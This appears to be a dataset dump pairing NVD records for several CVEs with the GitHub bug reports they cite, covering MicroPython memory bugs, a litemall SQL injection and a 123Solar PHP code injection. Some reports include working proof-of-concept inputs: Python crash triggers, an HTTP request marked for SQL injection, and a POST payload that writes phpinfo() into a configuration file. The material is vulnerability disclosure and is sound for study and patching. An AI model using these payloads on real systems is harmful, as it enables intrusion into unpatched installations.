{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "HIGH", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/micropython/micropython/commit/4bed614e707c0644c06e117f848fa12605c711cd" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13283" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13283#issuecomment-1918479709" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/micropython/micropython/releases/tag/v1.23.0" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.277765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.277765" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.409316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:micropython:micropython:1.22.2:*:*:*:*:*:*:*", "matchCriteriaId": "F367A317-2420-445C-B455-21BAFD6E2064", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/micropython/micropython/issues/13283#issuecomment-1918479709
[ "Exploit", "Third Party Advisory" ]
github.com
[ "micropython", "micropython" ]
Hi all, I'm Wonil Jang, from the research group S2Lab in UNIST. We found a use after free bug from micropython by our custom tool. The detailed information is as follows. ## Environment - OS: Ubuntu 22.04 - Version: micropython at commit a5bdd39127 - Build: unix ports - Bug Type: use-after-free - Bug Location: [micropython/py/objarray.c:509](https://github.com/micropython/micropython/blob/master/py/objarray.c#L509) - Credits: Junwha Hong and Wonil Jang, from S2Lab in UNIST ## Proof-of-Concept (PoC) ```python b = bytearray(b'1234567') for i in range(3): b[-1:] = b ``` ## Problem Statement By PoC, ```cpp STATIC mp_obj_t array_subscr(mp_obj_t self_in, mp_obj_t index_in, mp_obj_t **value**) { ... size_t src_len; void *src_items; size_t item_sz = mp_binary_get_size('@', o->typecode & TYPECODE_MASK, NULL); if (mp_obj_is_obj(value) && MP_OBJ_TYPE_GET_SLOT_OR_NULL(((mp_obj_base_t *)MP_OBJ_TO_PTR(value))->type, subscr) == array_subscr) { // value is array, bytearray or memoryview **mp_obj_array_t *src_slice = MP_OBJ_TO_PTR(value);** if (item_sz != mp_binary_get_size('@', src_slice->typecode & TYPECODE_MASK, NULL)) { compat_error: mp_raise_ValueError(MP_ERROR_TEXT("lhs and rhs should be compatible")); } **src_len = src_slice->len;** **src_items = src_slice->items;** #if MICROPY_PY_BUILTINS_MEMORYVIEW if (mp_obj_is_type(value, &mp_type_memoryview)) { src_items = (uint8_t *)src_items + (src_slice->memview_offset * item_sz); } #endif } ... if ((size_t)len_adj > o->free) { // TODO: alloc policy; at the moment we go conservative **o->items = m_renew(byte, o->items, (o->len + o->free) * item_sz, (o->len + len_adj) * item_sz);** o->free = len_adj; dest_items = o->items; } mp_seq_replace_slice_grow_inplace(dest_items, o->len, slice.start, slice.stop, **src_items**, src_len, len_adj, item_sz); ``` If you run the PoC, ```self_in``` and ```value``` can be same in ```array_subscr``` function. This is because when ```subscr()``` function is called, It just uses reference without copying. and then, if the address is rebased after calling realloc, only ```self_in``` changed and ```value```(src) becomes a dangling pointer. So when copying it, the use after free bug occurs. ## Patch It should keep source before calling fixed realloc(). ## Log ```cpp #1 0x5555557340a4 in array_subscr /home/qbit/testing-2023/micropython/ports/unix/../../py/objarray.c:509:21 #2 0x555555731de6 in mp_obj_subscr /home/qbit/testing-2023/micropython/ports/unix/../../py/obj.c:536:24 #3 0x555555781d05 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:487:21 #4 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #5 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13 #6 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12 #7 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19 #8 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #9 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #10 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34) ``` Thank you for reading my report.
use after free found at micropython/py/objarray.c:509 [micropython@a5bdd39127]
https://api.github.com/repos/micropython/micropython/issues/13283/comments
4
2023-12-27T16:49:55Z
2024-04-22T02:12:14Z
https://github.com/micropython/micropython/issues/13283
2,057,585,750
13,283
6,278
CVE-2024-8948
2024-09-17T19:15:29.747
A vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/micropython/micropython/commit/908ab1ceca15ee6fd0ef82ca4cba770a3ec41894" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/micropython/micropython/issues/13041" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.277766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.277766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.409317" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:micropython:micropython:1.23.0:*:*:*:*:*:*:*", "matchCriteriaId": "EBC6A30E-745D-4C20-B482-1358929743FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/micropython/micropython/issues/13041
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "micropython", "micropython" ]
Thank you for the super fast responses for the previous bugs, we found new bug in the core module. ## Summary - **OS**: Ubuntu 22.04 - **version**: micropython a00c9d5 - **port**: unix - **contribution**: Junwha Hong and Wonil Jang @S2-Lab, UNIST - **description**: Because the length check of int_to_bytes does not include 0, it leads to heap-buffer-overflow and Segmentation fault ## PoC ```c b = bytes(range(20)) ib = int.from_bytes(b, "big") print(ib.to_bytes( 0, "big")) ``` **Expected behavior in python3** ```c python3 ./poc_to_bytes Traceback (most recent call last): File "/home/qbit/testing-2023/micropython/fuzzing/output/default/crashes/./poc_to_bytes", line 3, in <module> print(ib.to_bytes( 0, "big")) OverflowError: int too big to convert ``` **micropython** ```c Segmentation fault ``` ## Problem Statement For the PoC, at `py/objint.c:423`, the `len` is 0, thus it pass through `if (len < 0)` ```c STATIC mp_obj_t int_to_bytes(size_t n_args, const mp_obj_t *args) { // TODO: Support signed param (assumes signed=False) (void)n_args; mp_int_t len = mp_obj_get_int(args[1]); if (len < 0) { mp_raise_ValueError(NULL); } bool big_endian = args[2] != MP_OBJ_NEW_QSTR(MP_QSTR_little); vstr_t vstr; vstr_init_len(&vstr, len); byte *data = (byte *)vstr.buf; memset(data, 0, len); #if MICROPY_LONGINT_IMPL != MICROPY_LONGINT_IMPL_NONE if (!mp_obj_is_small_int(args[0])) { mp_obj_int_to_bytes_impl(args[0], big_endian, len, data); ``` Then, it calls `mpz_as_bytes` at with zero `len`. here, thus `b` and `buf` are same before the for loop. ```c void mpz_as_bytes(const mpz_t *z, bool big_endian, size_t len, byte *buf) { byte *b = buf; if (big_endian) { b += len; } mpz_dig_t *zdig = z->dig; int bits = 0; mpz_dbl_dig_t d = 0; mpz_dbl_dig_t carry = 1; for (size_t zlen = z->len; zlen > 0; --zlen) { bits += DIG_SIZE; d = (d << DIG_SIZE) | *zdig++; for (; bits >= 8; bits -= 8, d >>= 8) { mpz_dig_t val = d; if (z->neg) { val = (~val & 0xff) + carry; carry = val >> 8; } if (big_endian) { *--b = val; if (b == buf) { return; } } else { ... } } } // fill remainder of buf with zero/sign extension of the integer if (big_endian) { len = b - buf; } else { ... } memset(buf, z->neg ? 0xff : 0x00, len); ``` Because it never satisfy the condition `if (b == buf)`, the b overflows to the left object. (under the start of the pointer). Additionally, the length is `-20`, because unexpectedly the condition `b < buf` was satisfied. ## Patch Patch is very simple. we just need to include 0 to the case. ```c STATIC mp_obj_t int_to_bytes(size_t n_args, const mp_obj_t *args) { // TODO: Support signed param (assumes signed=False) (void)n_args; mp_int_t len = mp_obj_get_int(args[1]); if (len <= 0) { mp_raise_ValueError(NULL); } bool big_endian = args[2] != MP_OBJ_NEW_QSTR(MP_QSTR_little); vstr_t vstr; vstr_init_len(&vstr, len); byte *data = (byte *)vstr.buf; memset(data, 0, len); #if MICROPY_LONGINT_IMPL != MICROPY_LONGINT_IMPL_NONE if (!mp_obj_is_small_int(args[0])) { **mp_obj_int_to_bytes_impl(args[0], big_endian, len, data);** ``` ## Crash log ```c #0 0x5555556ae6e0 in mpz_as_bytes /home/qbit/testing-2023/micropython/ports/unix/../../py/mpz.c:1611:22 #1 0x55555574583a in int_to_bytes /home/qbit/testing-2023/micropython/ports/unix/../../py/objint.c:440:9 #2 0x555555782c1c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1042:21 #3 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42 #4 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13 ****#5 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12 #6 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19 #7 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #8 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #9 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34) ``` **_Thank you for taking the time to review our bug report! :)_**
heap-buffer-overflow: from 0 length int_to_bytes
https://api.github.com/repos/micropython/micropython/issues/13041/comments
1
2023-11-21T16:51:00Z
2024-06-24T04:37:55Z
https://github.com/micropython/micropython/issues/13041
2,004,741,539
13,041
6,279
CVE-2024-46382
2024-09-19T13:15:04.007
A SQL injection vulnerability in linlinjava litemall 1.8.0 allows a remote attacker to obtain sensitive information via the goodsId, goodsSn, and name parameters in AdminGoodscontroller.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/linlinjava/litemall/issues/552" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linlinjava:litemall:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEBF7CF8-8C16-4129-AF35-F29414CD08EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/linlinjava/litemall/issues/552
[ "Exploit" ]
github.com
[ "linlinjava", "litemall" ]
SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the goodsId, goodsSn, name parameters of the AdminOrderController..java component. 1.Steps to reproduce (复现步骤) 访问商品管理,昵称输入1 ,点击查询,抓取数据包 ![微信图片_20240831160605](https://github.com/user-attachments/assets/9996cbc2-9353-4273-8ec7-e448a16bfab0) `GET /admin/order/list?page=1&limit=20&nickname=1*&consignee=1&orderSn=1&sort=add_time&order=desc&start=&end= HTTP/1.1 Host: 172.20.10.11:9527 Accept: application/json, text/plain, */* X-Litemall-Admin-Token: 31d38891-ae04-441e-8b2b-7f90371b030e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Referer: http://172.20.10.11:9527/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=31d38891-ae04-441e-8b2b-7f90371b030e; X-Litemall-Admin-Token=31d38891-ae04-441e-8b2b-7f90371b030e Connection: close ` ![微信截图_20240831161046](https://github.com/user-attachments/assets/da005f73-72c6-4aa5-83c9-452deecb4409)
[vulnerability] SQL Injection Vulnerability in AdminOrderController.java
https://api.github.com/repos/linlinjava/litemall/issues/552/comments
0
2024-08-31T08:12:17Z
2024-08-31T08:12:17Z
https://github.com/linlinjava/litemall/issues/552
2,498,722,441
552
6,280
CVE-2024-9006
2024-09-19T23:15:12.570
A vulnerability was found in jeanmarc77 123solar 1.8.4.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file config/config_invt1.php. The manipulation of the argument PASSOx leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as f4a8c748ec436e5a79f91ccb6a6f73752b336aa5. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/jeanmarc77/123solar/commit/f4a8c748ec436e5a79f91ccb6a6f73752b336aa5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/74" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeanmarc77/123solar/issues/74#issuecomment-2357653441" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278162" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278162" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.408298" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeanmarc77:123solar:1.8.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "B96B3FED-CC2C-46C3-8BBE-07E78A555F33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/jeanmarc77/123solar/issues/74
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeanmarc77", "123solar" ]
# Summary > 123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices. 123Solar 1.8.4.5 contains a PHP Code Injection vulnerability. Attackers can inject arbitrary PHP commands into the `PASSOx` parameter, which can then be executed by other PHP scripts that include `config/config_invt1.php`. # Details In the `/admin/admin_invt2.php` script, the value of the PASSOx parameter is directly written into the `config/config_invt1.php` file without proper filtering or escaping. ![image](https://github.com/user-attachments/assets/3d7ecffa-d8aa-4cc5-bc9f-ca6fdf60973d) This allows attackers to insert PHP code snippets into the PASSOx parameter, which will then be written to the configuration file and executed by other scripts that include this configuration file. ![image](https://github.com/user-attachments/assets/c9e12b19-40c9-4cd9-b7d0-0000091865d3) # POC ``` POST /admin/admin_invt2.php HTTP/1.1 Host: your-ip Content-Length: 843 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive INVNAMEx=test&PLANT_POWERx=4600&PHASEx=&CORRECTFACTORx=1&PASSOx=9999999;%0dphpinfo();%0d$test=1&SRx=no&PORTx=%2Fdev%2Fsolar&PROTOCOLx=aurora&ADRx=2&COMOPTIONx=-Y3&SYNCx=true&LOGCOMx=&SKIPMONITORINGx=&YMAXx=4500&YINTERVALx=1000&PANELS1x=10+Aleo+S_18+230W+Orientation%3A+90%C2%B0%2C+Pente%3A+45%C2%B0&PANELS2x=10+Aleo+S_18+230W+Orientation%3A+90%C2%B0%2C+Pente%3A+45%C2%B0&ARRAY1_POWERx=2300&ARRAY2_POWERx=2300&ARRAY3_POWERx=0&ARRAY4_POWERx=0&EXPECTJANx=72.5&EXPECTAPRx=420&EXPECTJUIx=497&EXPECTOCTx=199&EXPECTFEBx=125&EXPECTMAYx=484&EXPECTAUGx=415&EXPECTNOVx=89&EXPECTMARx=288&EXPECTJUNx=495&EXPECTSEPx=313&EXPECTDECx=60.5&EMAILx=&AWPOOLINGx=5&DIGESTMAILx=30&FILTERx=W011%2CW001%2CE011&MAILWx=&SENDALARMSx=true&SENDMSGSx=true&NORESPMx=true&LOGMAWx=&VGRIDUTx=208&VGRIDTx=250&RISOTx=8&ILEAKTx=15&POAKEYx=&POUKEYx=&TLGRTOKx=&TLGRCIDx=0&invt_numx=1 ``` Then visit http://your-ip/admin/admin_invt.php ![image](https://github.com/user-attachments/assets/85b40431-d69e-4b60-9ba7-133ecf010633)
123Solar 1.8.4.5 has a PHP Code Injection vulnerability
https://api.github.com/repos/jeanmarc77/123solar/issues/74/comments
1
2024-09-14T06:19:16Z
2024-09-18T07:00:25Z
https://github.com/jeanmarc77/123solar/issues/74
2,526,023,476
74
6,281
CVE-2024-9006
2024-09-19T23:15:12.570
A vulnerability was found in jeanmarc77 123solar 1.8.4.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file config/config_invt1.php. The manipulation of the argument PASSOx leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as f4a8c748ec436e5a79f91ccb6a6f73752b336aa5. It is recommended to apply a patch to fix this issue.
